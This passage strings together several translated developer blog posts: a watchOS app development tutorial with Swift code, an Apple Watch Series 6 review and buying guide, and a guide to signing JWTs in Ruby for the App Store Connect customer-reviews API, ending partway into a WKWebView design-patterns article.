+ let data:[ContactStruct] = [] //api returned data...
+
+ self.Table.setNumberOfRows(data.count, withRowType: "ContactRow")
+ //If you have multiple ROWs to present, use:
+ //self.Table.setRowTypes(["ContactRow","ContactRow2","ContactRow3"])
+ //
+ for item in data.enumerated() {
+ if let row = self.Table.rowController(at: item.offset) as? ContactRow {
+ row.nameLabel.setText(item.element.name)
+ //assign value to label/image......
+ }
+ }
+
+ //}
+ }
+
+ override func didDeactivate() {
+ // This method is called when watch view controller is no longer visible
+ super.didDeactivate()
+ loadData()
+ }
+
+ //Handle Row selection:
+ override func table(_ table: WKInterfaceTable, didSelectRowAt rowIndex: Int) {
+ guard let row = table.rowController(at: rowIndex) as? ContactRow,let id = row.id else {
+ return
+ }
+ self.pushController(withName: "showDetail", context: id)
+ }
+}
+
The operation of the Table is greatly simplified without delegate/datasource. To set the data, just call setNumberOfRows/setRowTypes to specify the number and type of rows, then use rowController(at:) to set the data content for each row!
The row selection event of the Table only requires overriding func table(_ table: WKInterfaceTable, didSelectRowAt rowIndex: Int) to operate! (Table only has this event)
First, set the Identifier for the Interface Controller
watchKit has two navigation modes:
Push method allows returning from the top left
Return to the previous page same as iOS UIKit: self.pop()
Return to the root page: self.popToRootController()
Open a new page: self.presentController()
Or in the Storyboard, on the Interface Controller of the first page, Control+Click and drag to the second page and select “next page”
Tab display mode allows switching pages left and right
The two navigation methods cannot be mixed.
Unlike iOS where you need to use custom delegates or segues to pass parameters, in watchKit, you can pass parameters by placing them in the contexts of the above methods.
Receive parameters in the InterfaceController’s awake(withContext context: Any?)
For example, if I want to navigate from page A to page B and pass an id: Int:
Page A:
1
+
self.pushController(withName: "showDetail", context: 100)
+
Page B:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
override func awake(withContext context: Any?) {
+ super.awake(withContext: context)
+ guard let id = context as? Int else {
+ print("Parameter error!")
+ self.popToRootController()
+ return
+ }
+ // Configure interface objects here.
+}
+
Compared to iOS UIKit, it is greatly simplified. Those who have developed for iOS should get the hang of it quickly! For example, label becomes setText() p.s. And surprisingly, there is no getText method, you can only use extension variables or store it in external variables
If you have developed iOS-related Extensions, you might instinctively use App Groups to share UserDefaults. I was excited to do this initially, but I got stuck for a long time and found that the data never transferred. After checking online, I found that since watchOS 2, this method is no longer supported…
You need to use the new WatchConnectivity method to communicate between the phone and the watch (similar to the socket concept). Both the iOS phone and the watchOS watch need to implement it. We write it in a singleton pattern as follows:
Mobile:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+
import WatchConnectivity
+
+class WatchSessionManager: NSObject, WCSessionDelegate {
+ @available(iOS 9.3, *)
+ func session(_ session: WCSession, activationDidCompleteWith activationState: WCSessionActivationState, error: Error?) {
+ // Mobile session activation completed
+ }
+
+ func session(_ session: WCSession, didReceiveUserInfo userInfo: [String : Any] = [:]) {
+ // Mobile received UserInfo from the watch
+ }
+
+ func session(_ session: WCSession, didReceiveMessage message: [String : Any], replyHandler: @escaping ([String : Any]) -> Void) {
+ // Mobile received Message from the watch
+ }
+
+ // Additionally, didReceiveMessageData and didReceiveFile also handle data received from the watch
+ // Decide which one to use based on your data transfer and reception needs
+
+ func sendUserInfo() {
+ guard let validSession = self.validSession, validSession.isReachable else {
+ return
+ }
+
+ if userDefaultsTransfer?.isTransferring == true {
+ userDefaultsTransfer?.cancel()
+ }
+
+ var list: [String: Any] = [:]
+ // Add UserDefaults to the list...
+
+ self.userDefaultsTransfer = validSession.transferUserInfo(list)
+ }
+
+ func sessionReachabilityDidChange(_ session: WCSession) {
+ // Connection status with the watch app changes (when the watch app is opened/closed)
+ sendUserInfo()
+ // When the status changes, if the watch app is opened, sync UserDefaults once
+ }
+
+ func session(_ session: WCSession, didFinish userInfoTransfer: WCSessionUserInfoTransfer, error: Error?) {
+ // Completed syncing UserDefaults (transferUserInfo)
+ }
+
+ func sessionDidBecomeInactive(_ session: WCSession) {
+
+ }
+
+ func sessionDidDeactivate(_ session: WCSession) {
+
+ }
+
+ static let sharedManager = WatchSessionManager()
+ private override init() {
+ super.init()
+ }
+
+ private let session: WCSession? = WCSession.isSupported() ? WCSession.default : nil
+ private var validSession: WCSession? {
+ if let session = session, session.isPaired && session.isWatchAppInstalled {
+ return session
+ }
+ // Return a valid and connected session with the watch app opened
+ return nil
+ }
+
+ func startSession() {
+ session?.delegate = self
+ session?.activate()
+ }
+}
+
WatchConnectivity Code for iPhone
Add WatchSessionManager.sharedManager.startSession()
in application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?)
of iOS/AppDelegate.swift
to connect the session after launching the iPhone app.
For Watch:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+
import WatchConnectivity
+
+class WatchSessionManager: NSObject, WCSessionDelegate {
+ func session(_ session: WCSession, activationDidCompleteWith activationState: WCSessionActivationState, error: Error?) {
+ }
+
+ func sessionReachabilityDidChange(_ session: WCSession) {
+ guard session.isReachable else {
+ return
+ }
+
+ }
+
+ func session(_ session: WCSession, didFinish userInfoTransfer: WCSessionUserInfoTransfer, error: Error?) {
+
+ }
+
+ func session(_ session: WCSession, didReceiveUserInfo userInfo: [String : Any] = [:]) {
+ DispatchQueue.main.async {
+ //UserDefaults:
+ //print(userInfo)
+ }
+ }
+
+ static let sharedManager = WatchSessionManager()
+ private override init() {
+ super.init()
+ }
+
+ private let session: WCSession? = WCSession.isSupported() ? WCSession.default : nil
+
+ func startSession() {
+ session?.delegate = self
+ session?.activate()
+ }
+}
+
+
WatchConnectivity Code for Watch
Add WatchSessionManager.sharedManager.startSession()
in applicationDidFinishLaunching()
of WatchOS Extension/ExtensionDelegate.swift
to connect the session after launching the Watch app.
To send data: sendMessage
, sendMessageData
, transferUserInfo
, transferFile
To receive data: didReceiveMessageData
, didReceive
, didReceiveMessage
The methods for sending and receiving data are the same on both ends.
You can see that data transfer from the watch to the phone works, but data transfer from the phone to the watch is limited to when the watch app is open.
The PushNotificationPayload.apns
file in the project directory comes in handy for testing push notifications on the simulator. Deploy the Watch App target on the simulator, and after installation, launching the app will receive a push notification with the content of this file, making it easier for developers to test push notification functionality.
To modify/enable/disable PushNotificationPayload.apns
, select the Target and then Edit Scheme.
watchOS Push Notification Handling:
Similar to iOS where we implement UNUserNotificationCenterDelegate, in watchOS we also implement the same methods in watchOS Extension/ExtensionDelegate.swift
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+
import WatchKit
+import UserNotifications
+import WatchConnectivity
+
+class ExtensionDelegate: NSObject, WKExtensionDelegate, UNUserNotificationCenterDelegate {
+
+ func applicationDidFinishLaunching() {
+
+ WatchSessionManager.sharedManager.startSession() // WatchConnectivity connection mentioned earlier
+
+ UNUserNotificationCenter.current().delegate = self // Set UNUserNotificationCenter delegate
+ // Perform any final initialization of your application.
+ }
+
+ func userNotificationCenter(_ center: UNUserNotificationCenter, willPresent notification: UNNotification, withCompletionHandler completionHandler: @escaping (UNNotificationPresentationOptions) -> Void) {
+ completionHandler([.sound, .alert])
+ // Similar to iOS, this approach allows push notifications to be displayed even when the app is in the foreground
+ }
+
+ func userNotificationCenter(_ center: UNUserNotificationCenter, didReceive response: UNNotificationResponse, withCompletionHandler completionHandler: @escaping () -> Void) {
+ // When the push notification is clicked
+ guard let info = response.notification.request.content.userInfo["aps"] as? NSDictionary, let alert = info["alert"] as? Dictionary<String, String>, let data = info["data"] as? Dictionary<String, String> else {
+ completionHandler()
+ return
+ }
+
+ // response.actionIdentifier can get the click event Identifier
+ // Default click event: UNNotificationDefaultActionIdentifier
+
+ if alert["type"] == "new_ask" {
+ WKExtension.shared().rootInterfaceController?.pushController(withName: "showDetail", context: 100)
+ // Get the current root interface controller and push
+ } else {
+ // Other handling...
+ // WKExtension.shared().rootInterfaceController?.presentController(withName: "", context: nil)
+
+ }
+
+ completionHandler()
+ }
+}
+
ExtensionDelegate.swift
watchOS Push Notification Display, divided into three types:
Works with mobile push notifications, here the iOS side has implemented UNUserNotificationCenter.setNotificationCategories
to add buttons below the notification; Apple Watch will also display them by default.
You can set the push notification handling method in the Static Notification Interface Controller Scene in Interface.storyboard
There’s not much to say about static, it just follows the default display method. Here we first introduce dynamic. After checking “Has Dynamic Interface,” a “Dynamic Interface” will appear where you can design your custom push notification presentation method (Buttons cannot be used):
My custom push notification presentation design
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+
import WatchKit
+import Foundation
+import UserNotifications
+
+class NotificationController: WKUserNotificationInterfaceController {
+
+ @IBOutlet var imageView: WKInterfaceImage!
+ @IBOutlet var titleLabel: WKInterfaceLabel!
+ @IBOutlet var contentLabel: WKInterfaceLabel!
+
+ override init() {
+ // Initialize variables here.
+ super.init()
+ self.setTitle("結婚吧") // Set the title at the top right
+ // Configure interface objects here.
+ }
+
+ override func willActivate() {
+ // This method is called when watch view controller is about to be visible to user
+ super.willActivate()
+ }
+
+ override func didDeactivate() {
+ // This method is called when watch view controller is no longer visible
+ super.didDeactivate()
+ }
+
+ override func didReceive(_ notification: UNNotification) {
+
+ if #available(watchOSApplicationExtension 5.0, *) {
+ self.notificationActions = []
+ // Clear the buttons added below the notification by iOS implementation of UNUserNotificationCenter.setNotificationCategories
+ }
+
+ guard let info = notification.request.content.userInfo["aps"] as? NSDictionary, let alert = info["alert"] as? Dictionary<String, String> else {
+ return
+ }
+ // Push notification information
+
+ self.titleLabel.setText(alert["title"])
+ self.contentLabel.setText(alert["body"])
+
+ if #available(watchOSApplicationExtension 5.0, *) {
+ if alert["type"] == "new_msg" {
+ // If it is a new message push notification, add a reply button below the notification
+ self.notificationActions = [UNNotificationAction(identifier: "replyAction", title: "Reply", options: [.foreground])]
+ } else {
+ // Otherwise, add a view button
+ self.notificationActions = [UNNotificationAction(identifier: "openAction", title: "View", options: [.foreground])]
+ }
+ }
+
+ // This method is called when a notification needs to be presented.
+ // Implement it if you use a dynamic notification interface.
+ // Populate your dynamic notification interface as quickly as possible.
+
+ }
+}
+
The program part, similarly, drag the outlet to the controller and implement the functionality.
Next, let’s talk about interactive, which is the same as dynamic, but you can add more buttons and control the program with the same class as dynamic; I didn’t use interactive because I added my buttons using self.notificationActions, the difference is as follows:
Left uses interactive, right uses self.notificationActions
Both methods require watchOS ≥ 5 support.
Using self.notificationActions to add buttons, the button events are handled by userNotificationCenter(_ center: UNUserNotificationCenter, didReceive response: UNNotificationResponse, withCompletionHandler completionHandler: @escaping () -> Void)
in ExtensionDelegate, and actions are identified by identifier.
Drag Menu from the component library, then drag Menu Item, and then drag IBAction to the program control
It will appear when you press hard on the page:
Use the built-in presentTextInputController method!
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
@IBAction func replyBtnClick() {
+ guard let target = target else {
+ return
+ }
+
+ self.presentTextInputController(withSuggestions: ["I'll reply later", "Thank you", "Feel free to contact me", "Okay", "OK!"], allowedInputMode: WKTextInputMode.plain) { (results) in
+
+ guard let results = results else {
+ return
+ }
+ // When there is input
+
+ let txts = results.filter({ (txt) -> Bool in
+ if let txt = txt as? String, txt != "" {
+ return true
+ } else {
+ return false
+ }
+ }).map({ (txt) -> String in
+ return txt as? String ?? ""
+ })
+ // Preprocess input
+
+ txts.forEach({ (txt) in
+ print(txt)
+ })
+ }
+}
+
Thank you for reading this! You’ve worked hard!
This concludes the article. It briefly mentioned UI layout, programming, push notifications, and interface applications. For those who have developed iOS, getting started is really quick, almost the same, and many methods have been simplified to make it more concise, but the things you can do have indeed decreased (like currently not knowing how to load more for Table); currently, there are very few things you can do, and I hope the official will open more APIs for developers to use in the future ❤️❤️❤️
Deploying Apple Watch App Target to the watch is really slow — Narcos
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Apple Watch Series 6 Unboxing and Buying Guide & Two-Year Usage Experience Summary
Time flies, it’s been two years since the last unboxing article of Apple Watch Series 4; in terms of functionality, Series 4 is more than enough without the need for an upgrade. Series 5/Series 6 don’t have any core breakthrough features, they are nice to have but not necessary.
However, due to the news about Little Ghost, I decided to give my original Series 4 LTE version to my family. The LTE version can make emergency calls without the need for a phone nearby, making it safer compared to the GPS version.
My personal habit is to wear it when going out and take it off to charge when I get home, so I don’t have the sleep experience part.
I bought the LTE version of Series 4, but since I always carry my phone with me, there’s no need to pay an extra $199 monthly fee to activate it. Moreover, replying to messages on the watch is cumbersome, and answering calls requires AirPods for convenience. Additionally, Spotify on the watch is purely a playback controller and cannot play independently from the iPhone (only Apple Music/KKBOX can).
and… I am an iOS APP / watchOS APP developer
[2020–10–24 Update]: Spotify now supports independent playback. In the watch Spotify APP, select the playback device -> Apple Watch -> connect Bluetooth earphones -> and you can play! (Still doesn’t support offline download playback, requires an internet connection to use).
Let’s get straight to the main event.
This time I chose the GPS 44’mm aluminum version in Cypress Green (military green), matching my iPhone 11 Pro in military green.
I didn’t catch the first batch of purchases, I ordered on the night of 9/15:
Apple Watch + RhinoShield Protective Case Set
Flip to the back, unboxing!
The entire unboxing process doesn’t require a knife, just tear it all the way.
Open!
One strap and one body.
The packaging thickness of this generation has significantly reduced (no more tofu head)
Body unboxing
Only includes magnetic charging cable.
Close-up of the device
This time, the protective material of the device is made of paper. I remember the previous generation was black velvet.
Unboxing the strap
Assembly!
Back view
When assembling, you can first install the upper part of the strap and then remove the paper protective cover to avoid slipping.
Apple Watch 6 + iPhone 11 Pro
with Olaf Chicken
Swimming Ring Chicken
Apple Watch 6 with RhinoShield case
Blood oxygen test
Playing with the main feature of this generation.
Always-on display sleep vs active
It’s great that the screen doesn’t turn off now. No need to raise your wrist and wait for the screen to light up to check messages!
Unboxing ends.
Summarizing the feelings of using it for two years and my own purchasing guide.
Apple Watch serves as an extension of the phone, acting as a buffer between the phone and the person. Currently, our reliance on electronic products is directly facing the phone and the overwhelming notifications.
I don’t know if you feel the same way, but phone notifications can be startling, even the sound of vibrations. Sometimes, receiving a notification makes my heart skip a beat. Then, I instinctively take out my phone to check it, handle important matters, and put the phone away if it’s not important. This process repeats daily…
Although you can turn off sound notifications, disable vibrations in silent mode, or even turn off all notifications, you might miss important messages, leading to another kind of anxiety where you constantly check your phone.
In this situation, Apple Watch can act as a lubricant, adding a filter between the person and the phone. When wearing the watch and the phone is in sleep mode, only the watch will notify you. You can set specific app notifications to be sent to the watch and disable sound/vibration for certain apps.
You might say these settings are similar to the phone, but in terms of experience, the watch’s sound/vibration is gentler and less intrusive. Even if you turn off sound/vibration, you can quickly check for notifications by raising your wrist.
The enhancement in daily experience and increased focus comes from quickly reviewing notifications on the watch and deciding whether to continue the current task or take out the phone to handle the message. The interruption time is very short (just the time to look at the watch), avoiding distractions from constantly taking out the phone and increasing work efficiency.
Using the exclusive “Fitness” app available only with Apple Watch, you can record your daily life, including daily activity levels, walking, heart rate, and exercise records. It provides detailed health information and statistics on activity levels. Socially, you can compete with friends on activity levels and unlock badges, increasing motivation for exercise.
However, exercise depends on the person. Those who exercise will continue to do so, and those who don’t won’t start just because of the watch. It mainly adds fun and records to the exercise routine.
You don’t need to take out your phone; just double-click the watch to make a payment, which is very convenient. Especially when your hands are full, and you can’t reach into your pocket to get your phone. You can also install invoice apps that support Apple Watch, open the barcode for the cashier to scan, and then double-click to call out Apple Pay for payment.
My personal habit is to use the phone widget to let the cashier scan the barcode or membership code (like 7-Eleven/FamilyMart, as they don’t provide Apple Watch apps), and then quickly double-click the watch to call out Apple Pay, using the same hand for payment.
Store inside, no receipt needed.
You can change the watch face and strap according to your mood; a few watch faces for work, a few for holidays; bought four straps in the past two years… leather, metal, woven, and even protective case color changes… to match your outfits.
I am very used to checking the current weather conditions and the probability of rain on the watch; it’s clear at a glance. Using the phone, I have to click through several layers to see the information I want.
The countdown timer and alarm are also features I love to use. You can quickly start the countdown timer on the watch, and when the timer or alarm goes off while wearing the watch, it will notify you through the watch (if the watch is on silent mode, it will vibrate to remind you).
I find it very comfortable, especially when I want to take a short nap and am afraid that the alarm sound or phone vibration will disturb other colleagues.
It’s quite useful when riding a scooter; you can directly view the route map, and get route/turn vibration prompts. However, the downside is that the map is not optimized for scooters, so you need to pay attention to roads where scooters are prohibited. The route planning ability is average.
View route map on the watch
Google Maps recently returned to Apple Watch, but you can’t directly view the route map, only text navigation prompts.
Since everyone is paying a lot of attention to this feature recently, I specifically listed it to share my personal experience. Once, when I was getting on a bus, I quickly and forcefully pushed against the seat with my left hand, successfully triggering the fall detection. The watch will first vibrate continuously and emit a sound to call you, checking if you are conscious. If you don’t respond within 30 seconds, it will call emergency services and notify the set emergency contacts.
Apple Watch Fall Detection Test, calls 119 for rescue in 1 minute.
- Before watchOS 5, fall detection was only enabled by default for those over 65 years old; it was disabled by default for those under 65. You can check the settings for this.
- Multiple emergency contacts can be specified, and need to be set in advance.
For those who have read the previous unboxing article, that article included unboxing, usage instructions, and some app recommendations. Honestly, I later deleted most of them, keeping only the built-in apps and some commonly used communication software. Initially, you might install a bunch of apps out of novelty, but later you won’t use them much.
To be honest, when you need complex operations, you’ll use your phone. The watch is really just for quick access.
As mentioned earlier, the functionality and product positioning of Series 4 and Series 6 have not changed; they are extensions of the iPhone, not replacements. There have been no breakthrough features in the past two years, and the battery life still requires daily charging.
In terms of third-party apps, not many have been added in the past two years, but there is a growing trend. Line and Google Maps have recently updated to enhance their Apple Watch apps, so they haven’t been forgotten.
I previously wrote an article sharing my experience of developing an Apple Watch app based on watchOS 5. You can see that the official features available for development are limited (still about the same now), so third-party developers have limited room to innovate, resulting in fewer apps.
Currently updated to watchOS 7, with an annual update cycle like iOS.
watchOS 6: Added environmental noise detection, menstrual cycle tracking (suitable for female users), and walkie-talkie feature.
watchOS 7: Added sleep tracking, handwashing timer assistance, and family sharing features.
I have personally experienced this feature by giving my original Series 4 watch to a family member. You can refer to this unboxing video. This feature binds the watch to your phone, and the watch needs to be nearby to change settings. After completing the setup process, some settings cannot be adjusted without resetting, and the shared family member can only use it, not customize it.
The benefit is that the wearer doesn’t necessarily have to be an iPhone user!
According to official information, this feature is only available for LTE versions of Series 4 and later models!
I think 80% of the friends who see this are already inclined to buy it; I believe if you are a tech enthusiast, it’s worth buying to play with. If a watch is an accessory for you, you can get a more beautiful one for the same price. If you are buying it solely for sports, there are better sports watches to consider. The Apple Watch is designed for comprehensive needs and enhanced experiences.
The performance is sufficient to last another 3-5 years. If you have the budget, of course, buy new rather than old. For value for money, you can buy the SE. If the budget is limited, you can buy a second-hand Series 4/5/LTE version, which is easier to get.
Apple Watch can only pair with iPhone (Android phones and iPads are not compatible). Also, consider the current iOS version of your phone. watchOS 7 is only compatible with iOS ≥ 14 (watchOS 6 => iOS ≥ 13/watchOS 5 => iOS ≥ 12)
The iPhone must be upgraded to the corresponding minimum iOS version to pair and use.
Series 6 / SE does not come with a charging adapter.
The Family Setup feature of watchOS 7 (which allows you to check the status of children and the health of the elderly) is only available for Series 4 and above or SE versions.
Stainless Steel Version (Thanks to a colleague for the support)
It depends on how you position this watch. If it’s for novelty and fun, aluminum is fine. If you want to enhance the accessory attribute, buy the stainless steel or above versions, which are more beautiful and easier to match.
The aluminum version has more demand in the second-hand market, making it easier to sell when a new generation comes out (I could still sell my Series 4 for 7-8 thousand).
The aluminum version’s body and glass are more fragile, and the screen glass is not scratch-resistant. It is recommended to buy a protective case and a full-coverage screen protector.
Protective case (about $400) + screen protector, it is recommended to find a hydrogel or jelly protector (about $800), otherwise, it is easy to encounter fitting problems; the total cost is about +$1500, and the aluminum version can also have complete protection.
Additionally, a lesson learned from experience: if you have a screen protector, you must buy a protective case, otherwise, the edges are easily damaged (I had to replace three protectors because of this, costing nearly $3000). The screen protector must be a good one that fits well, or it will be very difficult to use, which is a waste of money.
HAO Jelly Full-Coverage Glass Screen Protector from Xiao Hao Wrap
Fully transparent & fully adhesive, does not affect smooth sliding and display.
RhinoShield + Screen Protector
The screen will become slightly thicker, so the inner frame may float a bit (depending on the tolerance of the protective case), but the clips still fit in.
Xiao Hao Wrap suggests not to use the inner frame of RhinoShield as it may easily press against the screen protector, just use the outer frame. However, my Series 4 has been in this state for two years without any issues, so you can decide for yourself.
It depends on the thickness of your wrist. Generally, men are recommended to wear 44mm, as 40mm might look a bit odd.
If you are buying aluminum + protective case, consider whether the size with the protective case will be too large.
Considering that I didn’t use LTE much before, I opted for the GPS version this time, saving $3000.
The consideration between GPS or LTE is not only whether you will have scenarios where you only wear the watch out, but also the fall detection alarm function that everyone cares about recently. The GPS version only works if the phone is nearby or the watch can connect to the current network environment WiFi, allowing the watch to connect to the phone for emergency alarms (if these conditions are not met, it cannot notify for an alarm); the LTE version can operate independently, making it relatively safer. Communication between the phone and the watch is the same; the GPS version or non-activated LTE version communicates through the phone being nearby, or the watch being able to connect to the current network environment WiFi.
The watch being able to connect to the current network environment WiFi means that the phone and watch have previously connected to this WiFi, and the system has a record to connect directly.
watchOS 7’s Family Setup feature (can check children’s whereabouts, elderly health status) is only available on the LTE version because the watch’s data is sent back to the setup person (parent) rather than the wearer’s phone.
Watch bands are only categorized as:
And Apple guarantees that the band sizes will not change (otherwise, who would buy the Hermès version XD). At least for now, bands from generations 1 to 6 are interchangeable.
Unboxing of the Apple Watch Original Stainless Steel Milanese Loop
The Nike edition only has an exclusive Nike watch face, while the Hermès edition not only has an exclusive Hermès watch face but also comes with a Hermès band paired with the stainless steel version.
If you currently have a Series 3/Series 2/Series 1, it is recommended to upgrade, at least to Series 4; starting from Series 4, the screen becomes full-screen (many new watch faces require Series 4 or above), the processor performance is much better and almost never lags, making the upgrade noticeable.
Series 4 can be upgraded or not, as the main differences are the always-on display and the blood oxygen sensor. The Apple Watch’s raise-to-wake display is fast and responsive enough, and while the always-on display is better, it’s not a must-have; the blood oxygen sensor is not medically certified and is for reference only.
If you already have a Series 5, you can wait for the next generation, as there is no need to upgrade.
For a detailed comparison, refer to the official website’s Compare All Models, which also highlights some minor functional differences, such as the altimeter, compass, etc.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Understanding the implementation of AVPlayer/AVQueuePlayer with AVURLAsset using AVAssetResourceLoaderDelegate
First, I would like to deeply apologize to all the friends who have read the original article. Due to my recklessness in publishing the article without thorough research, some content was incorrect, wasting your precious time.
I have now restructured the entire context from scratch and rewritten the article. It includes a complete project program for everyone’s reference. Thank you!
Changes: About 30%
New Content: About 60%
Complete Guide to Implementing Local Cache with AVPlayer Click Here to View
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
App Store Connect API 2.0+ comprehensive update, supports In-app purchases, Subscriptions, Customer Reviews management
Upcoming transition from the XML feed to the App Store Connect API
This morning, I received the latest news from Apple developers, announcing that the App Store Connect API now supports three new features: In-app purchases, Subscriptions, and Customer Reviews management. This allows developers to more flexibly integrate Apple’s development process with CI/CD or business backends more closely and efficiently!
I haven’t touched In-app purchases or Subscriptions, but Customer Reviews excites me. I previously published an article titled “AppStore APP’s Reviews Slack Bot” discussing ways to integrate App reviews with workflow.
Slack Review Bot — ZReviewsBot
Before the App Store Connect API supported this, there were only two ways to get iOS App reviews:
First was to subscribe to Public RSS, but this RSS feed couldn’t be flexibly filtered, provided limited information, had a quantity limit, and we occasionally encountered data corruption issues, making it very unstable.
Second was through Fastlane — SpaceShip, which encapsulated complex web operations and session management to fetch review data from the App Store Connection backend (essentially running a web simulator crawler to fetch data from the backend).
important-note-about-session-duration by Fastlane
But because there is no other way, we can only do this until we received the news this morning…
⚠️ Note: The official plan is to cancel the original XML (RSS) access method in 2022/11.
I have developed a new “ ZReviewTender — Free and Open Source App Reviews Monitoring Bot “ based on the new App Store Connect API.
First, we need to log in to the App Store Connect backend, go to “Users and Access” -> “Keys” -> “ App Store Connect API “:
Click “+”, enter the name and permissions; for detailed permissions, refer to the official website instructions. To reduce testing issues, select “App Manager” to grant maximum permissions.
Click “Download API Key” on the right to download and save your “AuthKey_XXX.p8” Key.
⚠️ Note: This Key can only be downloaded once, please keep it safe. If lost, you can only Revoke the existing one & create a new one. ⚠️
⚠️ Do not leak the .p8 Key File ⚠️
1
+
curl -v -H 'Authorization: Bearer [signed token]' "https://api.appstoreconnect.apple.com/v1/apps"
+
Refer to official documentation.
1
+
{kid:"YOUR_KEY_ID", typ:"JWT", alg:"ES256"}
+
YOUR_KEY_ID
: Refer to the image above.
1
+2
+3
+4
+5
+6
+
{
+ iss: 'YOUR_ISSUE_ID',
+ iat: TOKEN creation time (UNIX TIMESTAMP e.g 1658326020),
+ exp: TOKEN expiration time (UNIX TIMESTAMP e.g 1658327220),
+ aud: 'appstoreconnect-v1'
+}
+
YOUR_ISSUE_ID
: Refer to the image above.
exp TOKEN expiration time
: It varies depending on different access functions or settings, some can be permanent, some expire after more than 20 minutes and need to be regenerated. For details, refer to official instructions.
jwt.rb:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
require 'jwt'
+require 'time'
+
+keyFile = File.read('./AuthKey_XXXX.p8') # YOUR .p8 private key file path
+privateKey = OpenSSL::PKey::EC.new(keyFile)
+
+payload = {
+ iss: 'YOUR_ISSUE_ID',
+ iat: Time.now.to_i,
+ exp: Time.now.to_i + 60*20,
+ aud: 'appstoreconnect-v1'
+ }
+
+token = JWT.encode payload, privateKey, 'ES256', header_fields={kid:"YOUR_KEY_ID", typ:"JWT"}
+puts token
+
+
+decoded_token = JWT.decode token, privateKey, true, { algorithm: 'ES256' }
+puts decoded_token
+
The final JWT result will look something like this:
1
+
4oxjoi8j69rHQ58KqPtrFABBWHX2QH7iGFyjkc5q6AJZrKA3AcZcCFoFMTMHpM.pojTEWQufMTvfZUW1nKz66p3emsy2v5QseJX5UJmfRjpxfjgELUGJraEVtX7tVg6aicmJT96q0snP034MhfgoZAB46MGdtC6kv2Vj6VeL2geuXG87Ys6ADijhT7mfHUcbmLPJPNZNuMttcc.fuFAJZNijRHnCA2BRqq7RZEJBB7TLsm1n4WM1cW0yo67KZp-Bnwx9y45cmH82QPAgKcG-y1UhRUrxybi5b9iNN
+
With the token, we can try out the App Store Connect API!
1
+
curl -H 'Authorization: Bearer JWT' "https://api.appstoreconnect.apple.com/v1/apps/APPID/customerReviews"
+
APPID
can be obtained from the App Store Connect backend:Or from the App Store page:
557252416
⚠️ You can only access the App review data for which you have permission ⚠️
A Ruby file that performs the above process. You can clone it, fill in the details, and test it directly.
First time opening:
1
+
bundle install
+
Getting Started:
1
+
bundle exec ruby jwt.rb
+
Similarly, we can access management through the API ( API Overview ):
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Scenarios of using Design Patterns (Strategy, Chain of Responsibility, Builder Pattern) when encapsulating iOS WKWebView.
Photo by Dean Pugh
Before discussing Design Patterns, it is worth mentioning that the most classic GoF 23 design patterns were published 30 years ago (in 1994). With changes in tools, languages, and software development patterns, many new design patterns have emerged in various fields. Design Patterns are not a universal solution or the only solution. Their existence is more like a “linguistic term” where the appropriate design pattern is applied in suitable scenarios, reducing obstacles in development collaboration. For example, applying the Strategy pattern here allows future maintainers to iterate directly according to the structure of the Strategy pattern, and design patterns mostly decouple well, providing significant assistance in scalability and testability.
XXXFactory
, it should not be used unless it is a factory patternWith ChatGPT, learning the practical application of Design Patterns has become easier. Just provide a detailed description of your problem, ask which design patterns are suitable for the scenario, and it can suggest several potentially suitable patterns with explanations. While not every answer may be perfect, it provides viable directions. By delving into these patterns and combining them with your practical scenarios, you can ultimately choose a good solution!
This Design Patterns practical application is to converge the functionality of the WKWebView object in the current Codebase and develop a unified WKWebView component. The experience of applying Design Patterns at appropriate logical abstraction points when developing the WKWebView component is shared.
The complete demo project code will be attached at the end of the document.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+
class WKWebViewController: UIViewController {
+
+ // MARK - Define some variables and switches for injecting features during external initialization...
+
+ // Simulate business logic: Switch to match special paths to open native pages
+ let noNeedNativePresent: Bool
+ // Simulate business logic: Switch for DeeplinkManager check
+ let deeplinkCheck: Bool
+ // Simulate business logic: Is it the homepage?
+ let isHomePage: Bool
+ // Simulate business logic: Scripts to inject into WKWebView as WKUserScript
+ let userScripts: [WKUserScript]
+ // Simulate business logic: Scripts to inject into WKWebView as WKScriptMessageHandler
